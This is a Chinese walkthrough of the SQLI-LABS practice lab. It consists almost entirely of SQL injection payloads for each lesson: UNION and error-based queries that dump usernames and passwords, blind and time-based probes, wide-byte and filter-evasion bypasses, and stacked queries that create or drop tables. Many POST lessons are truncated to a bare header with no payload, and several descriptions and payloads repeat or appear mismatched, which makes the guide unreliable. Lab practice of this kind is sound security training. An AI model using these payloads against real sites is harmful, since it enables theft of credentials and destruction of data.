【靶场】SQLI-LABS通关攻略
前言
SQLI-LABS通关攻略
Page-1 (Basic Challenges)
Less-1
1 | GET /Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+ |
Less-2
1 | GET /Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users --+ |
Less-3
1 | GET /Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users --+ |
Less-4
1 | GET /Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+ |
Less-5
1 | GET /Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+ |
Less-6
1 | GET /Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+ |
Less-7
1 | GET /Less-7/?id=1')) and ascii(substr((select database()),1,1))=115 --+ |
Less-8
1 | GET /Less-8/?id=1' and ascii(substr((select database()),1,1))=115 --+ |
Less-9
1 | GET /Less-9/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+ |
Less-10
1 | GET /Less-10/?id=1" and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+ |
Less-11
1 | POST /Less-11/ |
Less-12
1 | POST /Less-12/ |
Less-13
1 | POST /Less-13/ |
Less-14
1 | POST /Less-14/ |
Less-15
1 | POST /Less-15/ |
Less-16
1 | POST /Less-16/ |
Less-17
1 | POST /Less-17/ |
Less-18
- User-Agent 头注入
1 | POST /Less18/ |
Less-19
1 | POST /Less19/ |
Less-20
1 | GET /Less-20/index.php |
Page-2 (Advanced Injections)
Less-21
1 | GET /Less-21/index.php |
Less-22
1 | GET /Less-22/index.php |
Less-23
1 | GET /Less-23/?id=-1' union select 1,(select group_concat(username,0x3a,password) from users),3 or '1'='1 |
Less-24
- 注册
admin'#用户 - 登录
admin'#用户 - 修改
admin'#用户密码 - 退出登录
admin'#用户 - 登录
admin用户,密码为admin'#用户的新密码
—
Less-25
- 过滤 or/and 用 && ||
1 | ?id=-1' && 1=2 union select 1,2,3 and '1'='1 |
Less-25a
- 过滤空格 or/and
1 | ?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1 |
Less-26
- 过滤空格、注释、or/and
1 | ?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1 |
Less-26a
- 过滤 /*#– 空格
1 | ?id=-1'%0aunion%0aselect%0a1,2,3%0aand%0a'1'='1 |
Less-27
- 过滤 union select
1 | ?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1 |
Less-27a
- 过滤大小写关键字
1 | ?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1 |
Less-28
- 过滤 union select 注释
1 | ?id=-1' uNioN sElEcT 1,2,3 and '1'='1 |
Less-28a
- 多层过滤关键字
1 | ?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1 |
Less-29
- 过滤空格,保留引号
1 | ?id=-1'%09union%09select%091,2,3%09and%09'1'='1 |
Less-30
- 数字型过滤空格
1 | ?id=-1%09union%09select%091,2,3 |
Less-31
- 双引号过滤空格
1 | ?id=-1"%09union%09select%091,2,3%09and%09"1"="1 |
Less-32
- 宽字节 GBK %df 绕过 addslashes
1 | ?id=-1%df' union select 1,2,group_concat(username,0x3a,password) from users --+ |
Less-33
- 宽字节 mysql_real_escape_string
1 | ?id=-1%df' union select 1,2,3 --+ |
Less-34
- 宽字节 POST 注入
1 | uname 参数: |
Less-35
- 数字型无转义宽字节无影响
1 | ?id=-1 union select 1,2,3 --+ |
Less-36
- 单引号 mysql_real_escape_string 宽字节
1 | ?id=-1%df' union select 1,2,3 --+ |
Less-37
- POST 宽字节注入
1 | uname: |
Page-3 (Stacked Injections)
Less-38
- 堆叠注入多语句
1 | ?id=1';select group_concat(username,0x3a,password) from users;--+ |
Less-39
- 数字型堆叠注入
1 | ?id=1;select group_concat(username,0x3a,password) from users;--+ |
Less-40
- ‘) 闭合堆叠注入
1 | ?id=1');select group_concat(username,0x3a,password) from users;--+ |
Less-41
- 无过滤数字堆叠
1 | ?id=1;create table hack like users;--+ |
Less-42
- “) 堆叠注入
1 | ?id=1");select database();--+ |
Less-43
- ‘) 堆叠注入
1 | ?id=1');show tables;--+ |
Less-44
- 双引号堆叠
1 | ?id=1");select user();--+ |
Less-45
- ‘) 堆叠注入
1 | ?id=1');select group_concat(table_name) from information_schema.tables where table_schema=database();--+ |
Less-46
- 数字堆叠无过滤
1 | ?id=1;drop table if exists test;create table test(id int);--+ |
Less-47
- 单引号堆叠,过滤注释
1 | ?id=1';select database() and '1'='1 |
Less-48
- 过滤# – 堆叠注入
1 | ?id=1';select database() and '1'='1 |
Less-49
- 堆叠 + 空格过滤
1 | ?id=1';%09select%09database()%09and%09'1'='1 |
Less-50
- 数字堆叠空格过滤
1 | ?id=1;%09select%09database() |
Less-51
- POST 堆叠注入
1 | uname: |
Less-52
- POST 数字堆叠
1 | uname: |
Less-53
- POST ‘) 堆叠
1 | uname: |
Page-4 (Challenges)
Less-54
- 随机闭合 + 过滤关键字盲注
1 | ?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),1) and '1'='1 |
Less-55
- 随机 ‘) 闭合过滤
1 | ?id=1') and if(ascii(substr(database(),1,1))=115,sleep(2),1) and ('1'='1 |
Less-56
- 随机 “ 闭合过滤
1 | ?id=1" and if(ascii(substr(database(),1,1))=115,sleep(2),1) and "1"="1 |
Less-57
- 随机数字型过滤
1 | ?id=1 and if(ascii(substr(database(),1,1))=115,sleep(2),1) |
Less-58
- 单引号无注释严格过滤
1 | ?id=-1' uNioN sElEcT 1,2,3 and '1'='1 |
Less-59
- 双引号无注释过滤
1 | ?id=-1" uNioN sElEcT 1,2,3 and "1"="1 |
Less-60
- 数字型无注释过滤
1 | ?id=-1 uNioN sElEcT 1,2,3 |
Less-61
- POST 单引号随机过滤盲注
1 | uname: |
Less-62
- POST ‘) 闭合盲注
1 | uname: |
Less-63
- POST “ 闭合盲注
1 | uname: |
Less-64
- POST 数字盲注
1 | uname: |
Less-65
- POST “) 闭合过滤盲注
1 | uname: |